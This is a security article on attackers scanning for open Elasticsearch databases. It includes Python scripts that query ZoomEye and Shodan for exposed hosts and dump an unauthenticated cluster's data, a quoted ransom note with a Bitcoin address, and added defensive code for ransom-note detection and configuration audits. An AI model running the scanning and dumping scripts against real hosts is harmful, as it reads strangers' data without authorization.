Cybercriminals often exploit open databases that are accessible via the internet. These databases, when improperly secured, can be a gold mine for malicious actors. By using search engines like ZoomEye, attackers can programmatically locate databases left open to the public and use this access for harmful purposes, such as encrypting the data to demand ransom.
How ZoomEye is Queried Programmatically to find open Elastic Databases
ZoomEye is a search engine for discovering components of the internet, which includes devices, servers, and databases. Below is a Python script that demonstrates how one might programmatically search ZoomEye for Elasticsearch databases that have recently been opened to the internet:
import requests
from datetime import datetime, timedelta


def search_zoomeye():
    # Restrict the search to hosts ZoomEye first indexed within the last week
    date_7_days_ago = (datetime.now() - timedelta(days=7)).strftime('%Y-%m-%d')
    url = "https://api.zoomeye.hk/host/search"
    query = f'app:"elasticsearch" -401 +port:9200 +after:{date_7_days_ago}'
    headers = {
        "API-KEY": "<your-api-key>",
        "User-Agent": "<your-user-agent>"
    }
    page = 1
    results_per_page = 10
    with open('ip_elastic.txt', 'w') as file:
        while True:
            params = {
                "query": query,
                "page": page,
                "facets": "app,os"
            }
            print(f"Fetching page {page}...")
            response = requests.get(url, headers=headers, params=params)
            if response.status_code == 200:
                data = response.json()
                for match in data['matches']:
                    # One address per line (the original wrote a literal 'n' instead of a newline)
                    file.write(match['ip'] + '\n')
                print(f"Page {page} processed. IPs written to ip_elastic.txt.")
                # Stop once every page reported by ZoomEye has been fetched
                if page * results_per_page >= data['total']:
                    break
                page += 1
            else:
                print(f"Failed to fetch data: HTTP {response.status_code}")
                break
    print("Finished fetching IP addresses.")


if __name__ == "__main__":
    search_zoomeye()
How Shodan is Queried Programmatically to find open Elastic Databases
The script uses Shodan to find open Elasticsearch instances, converts their IP addresses from integer to standard dot notation, and then checks each instance for sensitive data. It examines the content of Elasticsearch indices for sensitive keywords and patterns (like email addresses), indicating personal or confidential data. Identified data is stored locally in structured directories based on the type of information found, either related to personal email accounts or other sensitive details. The excerpt below covers the first of these steps: it queries Shodan, converts the first match's integer IP to dotted notation, and prints that instance's unauthenticated _search response.
import requests
import json
import socket
from struct import pack


def int_to_ip(int_ip):
    # Shodan's host search returns the address as a 32-bit integer
    return socket.inet_ntoa(pack("!I", int_ip))


def simple_search(host):
    # An exposed cluster answers /_search on 9200 with no credentials at all
    url = f"http://{host}:9200/_search?pretty"
    try:
        response = requests.get(url, timeout=5)
        if response.status_code == 200 and 'application/json' in response.headers.get('Content-Type', ''):
            print("Data fetched successfully.")
            data = response.json()
            print(json.dumps(data, indent=2))
        else:
            print("Failed to fetch data or wrong content type.")
    except Exception as e:
        print(f"Error querying Elasticsearch on {host}: {e}")


def fetch_data_from_shodan():
    print("Connecting to Shodan")
    api_key = "YourShodanAPIKey"
    url = f"https://api.shodan.io/shodan/host/search?key={api_key}&query=product:elastic%20port:9200%20http:200"
    response = requests.get(url)
    if response.status_code == 200:
        data = response.json()
        matches = data.get('matches', [])
        if matches:
            # Only the first match is examined in this excerpt
            ip_address = int_to_ip(matches[0]['ip'])
            print(f"Analyzing Elasticsearch instance at {ip_address}...")
            simple_search(ip_address)
        else:
            print("No matches found.")
    else:
        print("Failed to connect to Shodan API")


if __name__ == "__main__":
    fetch_data_from_shodan()
The Rapid Exploitation of Open Databases and Its Implications for Security: Automated Attacks and the Reality of Ransom Notes in Open Databases
In recent explorations using scripts designed to interact with open Elasticsearch and MongoDB databases via Shodan and direct IP queries, a significant discovery was made: the majority of these databases did not contain expected user or operational data but were instead filled with ransom notes. These notes typically demanded payment in Bitcoin to recover the allegedly stolen data, suggesting a widespread and systematic exploitation of poorly secured databases. An example of such a ransom note reads:
"All your data is backed up. You must pay 0.0060 BTC to 1tpwVPxbRNtQuzKonhzdEsJL8n562uwAr. In 48 hours, your data will be publicly disclosed and deleted. For more information, go to [specific URL]. After paying, send mail to us at [specific email] and we will provide a link for you to download your data. Your DBCODE is: 1ZO14A."
This finding highlights a grim reality in the cybersecurity landscape: cybercriminals are leveraging automated tools to scan for and exploit unprotected databases. Once access is gained, these databases are often encrypted or wiped clean, replaced with a ransom demand. The efficiency and speed of these attacks indicate that new, unprotected databases can be compromised shortly after becoming accessible online.
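The same _search output that the scripts above dump can be used the other way round, by a defender checking their own clusters for the wiped-and-ransomed state described here. The following detector is an added example, not code from the article: it takes the JSON of an Elasticsearch /_search response, groups hits by index, and scores each index for ransom-note indicators. The phrases come from the note quoted above; the index-name pattern, the address regexes, the score weights and the threshold are heuristics of my own, and the sample response is constructed.

```python
import re
from dataclasses import dataclass, field

# Indicators of a database-wiping ransom note. The phrases mirror the note
# quoted in the article; the index-name pattern, address regexes and weights
# are assumptions (common conventions, not something the article documents).
BTC_ADDRESS = re.compile(r"\b(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{25,62})\b")
RANSOM_PHRASES = (
    "all your data is backed up",
    "you must pay",
    "btc",
    "dbcode",
    "publicly disclosed",
    "download your data",
)
SUSPICIOUS_INDEX = re.compile(r"read.?me|recover|restore|ransom|warning", re.IGNORECASE)
RANSOM_THRESHOLD = 4


@dataclass
class IndexFinding:
    index: str
    score: int = 0
    reasons: list = field(default_factory=list)


def score_source(finding: IndexFinding, source: dict) -> None:
    """Add the ransom indicators found in one document's _source to the finding."""
    raw = " ".join(str(v) for v in source.values())
    lowered = raw.lower()
    # Base58 is case-sensitive, so the address search runs on the raw text
    if BTC_ADDRESS.search(raw):
        finding.score += 3
        finding.reasons.append("bitcoin address")
    for phrase in RANSOM_PHRASES:
        if phrase in lowered:
            finding.score += 1
            finding.reasons.append(f"phrase: {phrase}")


def assess_search_response(response: dict) -> dict:
    """Classify the hits of an Elasticsearch /_search response, index by index."""
    findings = {}
    for hit in response.get("hits", {}).get("hits", []):
        name = hit.get("_index", "")
        finding = findings.setdefault(name, IndexFinding(index=name))
        # Count the index-name indicator once per index, not once per document
        if SUSPICIOUS_INDEX.search(name) and "index name" not in finding.reasons:
            finding.score += 2
            finding.reasons.append("index name")
        score_source(finding, hit.get("_source", {}))
    ransomed = sorted(n for n, f in findings.items() if f.score >= RANSOM_THRESHOLD)
    return {
        "verdict": "ransom note present" if ransomed else "no ransom indicators",
        "ransomed_indices": ransomed,
        "findings": findings,
    }


# Constructed sample: the shape of a /_search response from an exposed cluster,
# with one index holding the note quoted in the article and one ordinary index.
SAMPLE_RESPONSE = {
    "hits": {
        "total": {"value": 2, "relation": "eq"},
        "hits": [
            {
                "_index": "read_me_to_recover_your_data",
                "_id": "1",
                "_source": {
                    "message": (
                        "All your data is backed up. You must pay 0.0060 BTC to "
                        "1tpwVPxbRNtQuzKonhzdEsJL8n562uwAr. In 48 hours, your data "
                        "will be publicly disclosed and deleted. After paying, send "
                        "mail to us and we will provide a link for you to download "
                        "your data. Your DBCODE is: 1ZO14A."
                    )
                },
            },
            {
                "_index": "orders-2024.05",
                "_id": "9f3",
                "_source": {"order_id": 1843, "status": "shipped", "total": 42.5},
            },
        ],
    }
}


if __name__ == "__main__":
    result = assess_search_response(SAMPLE_RESPONSE)
    print(result["verdict"], result["ransomed_indices"])
    for f in result["findings"].values():
        print(f"{f.index}: score={f.score} reasons={f.reasons}")
```

Feed it the response your own (authenticated) monitoring pulls from each cluster; an index whose only content is a note that scores above the threshold, sitting next to indices that have vanished, is the signature the article describes, and it is worth alerting on before a user reports the missing data.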
Implications for Security
1. Speed of Exploitation: The automation of such attacks means that vulnerabilities can be exploited almost as soon as they are exposed. This leaves a very narrow window for administrators to secure their systems.
2. Need for Proactive Security Measures: It’s no longer sufficient to react to security incidents as they occur. Proactive measures, including continuous monitoring and the implementation of robust security policies, are essential.
3. Education and Awareness: Educating system administrators and developers about the importance of database security, from the moment of deployment, is critical. This includes the use of firewalls, strong authentication mechanisms, and ensuring that databases are not exposed to the internet without necessary protections.
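The third point, not exposing a database without authentication, comes down to a handful of lines in elasticsearch.yml. The audit below is an added example, not code from the article or from Elastic: it reads the flat key/value lines that file normally consists of and reports the combination the scanners above look for, a non-loopback network.host with xpack.security.enabled set to false, plus missing HTTP TLS. The setting names are real Elasticsearch settings; the two sample files, the 10.0.5.12 address and the severity labels are constructed, and the parser deliberately ignores nested YAML.

```python
# Hosts that keep the REST API off the network even without authentication
LOOPBACK_HOSTS = {"_local_", "localhost", "127.0.0.1", "::1"}


def parse_flat_yaml(text: str) -> dict:
    """Read the flat `key: value` lines elasticsearch.yml normally consists of.
    Nested mappings and lists are out of scope for this check (assumption)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip("'\"")
    return settings


def audit_settings(settings: dict) -> list:
    """Return (severity, message) pairs for settings that leave port 9200 exposed."""
    findings = []
    # network.host defaults to the loopback address when it is not set
    host = settings.get("network.host", "_local_")
    security = settings.get("xpack.security.enabled", "").lower()
    tls = settings.get("xpack.security.http.ssl.enabled", "").lower()
    exposed = host not in LOOPBACK_HOSTS
    if exposed and security == "false":
        findings.append(("CRITICAL", f"network.host={host} with xpack.security.enabled=false: "
                         "the REST API answers without authentication, the exact exposure scanners look for"))
    elif exposed and security == "":
        findings.append(("HIGH", f"network.host={host} and xpack.security.enabled is not set: "
                         "confirm security is on for this version instead of relying on the default"))
    if exposed and tls != "true":
        findings.append(("MEDIUM", "xpack.security.http.ssl.enabled is not true: "
                         "credentials and documents cross the network in cleartext"))
    return findings


WEAK_CONFIG = """\
# constructed sample: listens on every interface with security switched off
cluster.name: prod-search
network.host: 0.0.0.0
http.port: 9200
xpack.security.enabled: false
"""

HARDENED_CONFIG = """\
# constructed sample: bound to one internal address, authentication and TLS on
cluster.name: prod-search
network.host: 10.0.5.12
http.port: 9200
xpack.security.enabled: true
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.keystore.path: certs/http.p12
"""


def audit_file(path: str) -> list:
    """Audit a real elasticsearch.yml on disk."""
    with open(path, encoding="utf-8") as fh:
        return audit_settings(parse_flat_yaml(fh.read()))


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"[{label}]")
        for severity, message in audit_settings(parse_flat_yaml(text)) or [("OK", "no exposure findings")]:
            print(f"  {severity}: {message}")
```

Running this in a deployment pipeline, before the node is started, closes the narrow window from the first point: a config that would answer unauthenticated on a routable address never reaches the internet in the first place. The host firewall the third point also mentions lives outside this file and still needs its own check.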
The Cost of Ransomware
The demand noted in the example above asks for 0.0060 BTC. With the fluctuating nature of Bitcoin’s value, this amount can represent a substantial sum. For instance, if Bitcoin’s value is approximately $30,000 USD per Bitcoin, the ransom of 0.0060 BTC equates to around $180 USD. This amount, while not exorbitant, can add up across multiple attacks, contributing to a lucrative criminal enterprise. Moreover, the actual cost to organizations is often much higher, factoring in downtime, loss of data, potential breach of customer information, and damage to reputation.